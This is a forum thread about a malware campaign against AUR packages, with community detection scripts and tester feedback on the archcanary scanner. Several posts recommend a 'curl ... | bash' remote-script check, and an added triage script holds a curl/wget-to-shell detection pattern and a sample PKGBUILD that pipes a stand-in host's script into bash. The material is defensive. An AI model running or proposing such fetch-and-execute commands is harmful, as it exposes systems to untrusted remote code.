Attack wave on AUR packages!

I got this message from the Garuda forum…

Just as a heads-up, we are aware of the current wave of injections of malicious content into AUR packages.

Our security measures in chaotic-aur are working perfectly so far and have already prevented a few of them from getting deployed.

Please be extra careful when updating packages directly from AUR in the coming days! Especially watch out for the addition of an npm dependency and an additional .install script in PKGBUILDs.

Also see this post for more context:

3 Likes

How to check if an infected package is installed

curl -s https://cscs.pastes.sh/raw/aurvulntest20260611.sh | bash
2 Likes

Thanks for this @muzqs, I was just about to suggest this one too

curl -s https://cscs.pastes.sh/raw/aurvulntest20260611.sh | bash

Checking for infected AUR packages (494 total)…

Clean: None of the known infected packages were installed within 48 hours of the campaign.

You can also run pacman -Qm and check the PKGBUILD files manually if you’re extra concerned about the malware attack

2 Likes
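The manual check suggested above, as an added example that is not part of the thread or of any tool it mentions: it looks at one PKGBUILD for the indicators the first post names (an install= script and an npm/nodejs dependency) plus remote content piped into a shell, and uses its exit status as the finding count. The yay cache path in the usage comment is an assumption.

```shell
#!/bin/sh
# Added example (not from the thread): triage one PKGBUILD for the indicators
# the first post warns about. Exit status = number of findings (0 = clean).

check_pkgbuild() {
    pkg=$1; file=$2; findings=0
    [ -r "$file" ] || { echo "$pkg: cannot read $file"; return 1; }
    # flatten the file so multi-line depends=(...) arrays match; drop quotes
    flat=$(tr -d "'\"" < "$file" | tr '\n' ' ')

    # 1. install= names a .install script whose hooks run as root on install/upgrade
    if grep -Eq '^[[:space:]]*install=' "$file"; then
        echo "$pkg: install script: $(grep -E '^[[:space:]]*install=' "$file" | head -n1)"
        findings=$((findings + 1))
    fi
    # 2. npm/nodejs appearing in any *depends=( ... ) array
    if printf '%s' "$flat" | grep -Eq 'depends=\([^)]*[([:space:]](npm|nodejs)[[:space:]=>)]'; then
        echo "$pkg: npm/nodejs dependency declared"
        findings=$((findings + 1))
    fi
    # 3. curl/wget output piped straight into a shell inside the build functions
    if grep -Eq '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh' "$file"; then
        echo "$pkg: remote content piped into a shell"
        findings=$((findings + 1))
    fi
    return "$findings"
}

# Constructed sample PKGBUILD (not a real package) that trips all three checks.
write_sample_pkgbuild() {
    cat > "$1" <<'EOF'
pkgname=demo-tool
pkgver=1.0
depends=('glibc'
         'nodejs')
install=demo-tool.install
build() {
    curl -s https://example.invalid/setup.sh | bash
}
EOF
}

# Real use: for p in $(pacman -Qmq); do check_pkgbuild "$p" "$HOME/.cache/yay/$p/PKGBUILD"; done
# (the yay cache path is an assumption; paru keeps clones under ~/.cache/paru/clone)
SAMPLE=$(mktemp); write_sample_pkgbuild "$SAMPLE"
check_pkgbuild demo-tool "$SAMPLE" || echo "findings: $?"
rm -f "$SAMPLE"
```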


For your interest.

This GitHub repo was created in response to the attacks on the AUR.
Despite being new, it has already gathered 900+ stars.

GitHub - lenucksi/aur-malware-check: Detection tools for the June 2026 atomic-lockfile AUR supply-chain attack. Consolidated from community Gists.

1 Like

Several days ago the number of packages rose to 1500. They are using an improved method with JavaScript files in order to avoid detection too. :unamused_face:

Interesting to add to archcanary. @M0nst3r Do you know the list of JavaScript files infected?

If it is added to the archlinux list, archcanary will add it to the list. Needs more investigation.


ARCHCANARY [beta]

I’ve been working on a security scanner for Arch-based systems and I’m looking for a few testers.

It audits your system for common security risks — things like package integrity, config issues, and known vulnerabilities relevant to Arch. It gives you a clear picture of where your system stands so you can decide what to act on. Read-only, no files are touched or changed.

Still early, but functional. If you’re interested, let me know here or check the repo. It is a lot to take in, so take your time.

Start with the README.md and also read docs/*.md for more specific info.

Installation: Use ./install. The PKGBUILD can be behind the latest commits.

If you have ideas for archcanary, open a discussion on GitHub.
Create an issue for bug reports.

:penguin: work in progress…

1 Like

I found the news at Phoronix. To be more precise, some Node.js packages are the ones reported, as you will read in one of the links. :thinking:

1 Like

I’m just going to assume that this is a good report.

1 Like

Thanks for testing. Looks good indeed.

FMI: Have you installed with:

./install.sh

or

./install.sh --system

The --system install also sets up systemd services — a timer that runs background scans and a path unit that triggers automatically on pacman activity (installs, upgrades). See docs/systemd.md

I’m curious if you have also installed traur, or even/also aurscan (uses an LLM).

FYI AURSCAN: These are the official aurscan versions.

2 aur/aurscan-manticore-release-git 0.5.2-3 (+1 1.00) [20h38m] 
    LLM-powered pre-build malware scanner for AUR packages (with paru / yay hooks) -- git release
3 aur/aurscan-manticore-bin-release-git 0.5.2-5 (+0 0.00) [15h40m] 
    LLM-powered pre-build malware scanner for AUR packages (with paru / yay hooks) -- git release binary

The aurscan version from the fork is adapted with some fixes to work better with the GUI.

FMI: Can you show the output of:

archcanary --doctor

Example:

============================================================
 Archcanary — setup doctor
============================================================

Platform
  detected:    Mabox Linux
  AUR helpers: yay pamac
  mhwd:        present (Manjaro driver manager — expect DKMS modules)

User install
  [ OK ]  package list (config dir)

System install (root)
  [ OK ]  scanner script (/usr/lib/archcanary)
  [ OK ]  root helper (enables root checks in GUI)
  [ OK ]  polkit policy (authorizes the root helper)
  [ OK ]  DKMS allowlist

Automation (systemd)
  [ OK ]  system scan timer (weekly + boot)
  [ OK ]  post-install trigger (scan after each pacman transaction)
  [ OK ]  user scan timer (cache/autostart checks)
  [ OK ]  desktop notifier (alerts on new scan results)

Pre-install layer (external tools)
  [ OK ]  aurscan (pre-install PKGBUILD scanner)
  [ OK ]  claude CLI (aurscan LLM backend)
  [ OK ]  traur (pre-install behavioral scanner)
  [ OK ]  traur pacman hook (auto-runs on every install)
  [ OK ]  lynis (system hardening auditor)
  [ OK ]  yay hooks (auto-scan on yay install)

============================================================
 RESULT: all elements present.
============================================================

:penguin:

Thanks for the link. Working on adding it to archcanary.

^ This. I was unaware of the system-wide mode. Will install it that way and do some further testing. I probably should have read the git repository before installing because the system-wide option seems better. Question before I roll back to yesterday and re-install: is it possible to do a system-wide installation without torching the current user installation? In other words, is it harmful in any way NOT to revert to pre-installation?

^ No, I will install and test today and get back to you.

============================================================
 Archcanary — setup doctor
============================================================

Platform
  detected:    Mabox Linux
  AUR helpers: yay pamac
  mhwd:        present (Manjaro driver manager — expect DKMS modules)

Dependencies (official repos)
  [ OK ]  yad (GUI toolkit)
  [MISS]  bpftool (eBPF enumeration)
           ↳ fix: sudo pacman -S bpf
  [ OK ]  notify-send (desktop alerts)
  [ OK ]  pkexec (GUI root checks)

User install
  [ OK ]  main scanner (~/.local/bin)
  [ OK ]  GUI (~/.local/bin)
  [ OK ]  package list (config dir)

System install (root)
  [MISS]  scanner script (/usr/lib/archcanary)
           ↳ fix: sudo bash install.sh   # (run from the archcanary repo) --system
  [MISS]  root helper (enables root checks in GUI)
           ↳ fix: sudo bash install.sh   # (run from the archcanary repo) --system
  [MISS]  polkit policy (authorizes the root helper)
           ↳ fix: sudo bash install.sh   # (run from the archcanary repo) --system
  [MISS]  DKMS allowlist
           ↳ fix: sudo bash install.sh   # (run from the archcanary repo) --system

Automation (systemd)
  [MISS]  system scan timer (weekly + boot)
           ↳ fix: sudo bash install.sh   # (run from the archcanary repo) --system
  [MISS]  post-install trigger (scan after each pacman transaction)
           ↳ fix: sudo bash install.sh   # (run from the archcanary repo) --system
  [ OK ]  user scan timer (cache/autostart checks)
  [ OK ]  desktop notifier (alerts on new scan results)

Pre-install layer (external tools)
  [OPT ]  aurscan (pre-install PKGBUILD scanner)
  [OPT ]  traur (pre-install behavioral scanner)
  [OPT ]  lynis (system hardening auditor)
  [ OK ]  yay hooks (auto-scan on yay install)

NEXT STEP → bpftool (eBPF enumeration)
  run: sudo pacman -S bpf
  then re-run --doctor to advance to the next step.

============================================================
 RESULT: all elements checked — some need attention, see fixes above.
============================================================

1 Like

Good question. This should be the case, but I see it is not.

Pushed it now. The .config/archcanary is kept now after uninstalling. Thanks

release v0.1.9

Major changes and fixes.

Indeed installing with --system gets the most out of it. Root is not needed for the malware and pkgbuild scanners.

git pull
./install --system

You don’t need to uninstall, just install again.

The user installation is basically the malware scanner. Full scan.

1 Like

Thanks for the output. It shows a bug.
Fixed.

After git pull the latest.

  • install/uninstall --system leaves the user config untouched.
1 Like

I have no clue what this means for my system.

1 Like

Hi @SauronsMouth ,

Thanks again for testing and finding a bug.

Archcanary (bpf) was producing a false positive.

Fixed

git pull
./install --system

Keep in mind I haven’t rebooted since the 21st. Maybe I should?

Also, clicking ‘About’ does nothing. (edit: Ah HA, double clicking works)

After a fresh reboot.

Apparently a reboot didn’t help.

Please avoid pictures for showing output and use copy/paste terminal output. :wink: thanks…

Can you post the output again.

Look for any pids line that isn’t systemd(1) or system-something(N).
Probably a false positive.

Updated: git pull ; ./install --system

The output will now be

WARNING: lsm eBPF programs loaded by unknown process (expected systemd / AppArmor /SELinux).
Unknown loaders: firejail(1234)
If this looks like a false positive, report it at
https://github.com/musqz/archcanary/issues

Unknown loaders: should show the packages with pid.

:penguin:
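The check the last few posts describe (which process loaded each LSM-type eBPF program, and is it something other than systemd or the AppArmor/SELinux userspace), as an added example that is not archcanary’s own code. It parses `bpftool prog show` output, which prints a `pids comm(pid)` line only when bpftool was built with that support; the allowlist of expected loader names and the sample output are assumptions constructed for the example.

```shell
#!/bin/sh
# Added example (not archcanary's code): list loaders of lsm-type eBPF programs
# that are not on an allowlist (systemd, apparmor*, selinux*). Input is the
# text of `bpftool prog show` on stdin; prints one "comm(pid)" per line.

unknown_lsm_loaders() {
    awk '
        /^[0-9]+:/ { inlsm = ($2 == "lsm") }   # program header: "12: lsm  name ..."
        inlsm && $1 == "pids" {
            for (i = 2; i <= NF; i++) {
                entry = $i; sub(/,$/, "", entry) # "systemd(1)," -> "systemd(1)"
                comm = entry; sub(/\(.*/, "", comm)
                # allowlist is an assumption matching the tool message quoted above
                if (comm !~ /^(systemd|apparmor.*|selinux.*)$/ && !(entry in seen)) {
                    seen[entry] = 1; print entry
                }
            }
        }'
}

# Constructed sample output (not captured from a real host).
SAMPLE='12: lsm  name bpf_lsm_demo  tag 0000000000000000  gpl
    loaded_at 2026-06-12T10:00:00+0000  uid 0
    pids systemd(1)
15: lsm  name sandbox_hook  tag 0000000000000000  gpl
    loaded_at 2026-06-12T10:01:00+0000  uid 0
    pids firejail(1234), systemd(1)
20: cgroup_skb  name netfilter  tag 0000000000000000  gpl
    pids dockerd(888)
'
# Real use:  sudo bpftool prog show | unknown_lsm_loaders
printf '%s' "$SAMPLE" | unknown_lsm_loaders
```

Only the lsm program loaded by firejail is reported; the cgroup_skb program loaded by dockerd is ignored because it is not an LSM hook.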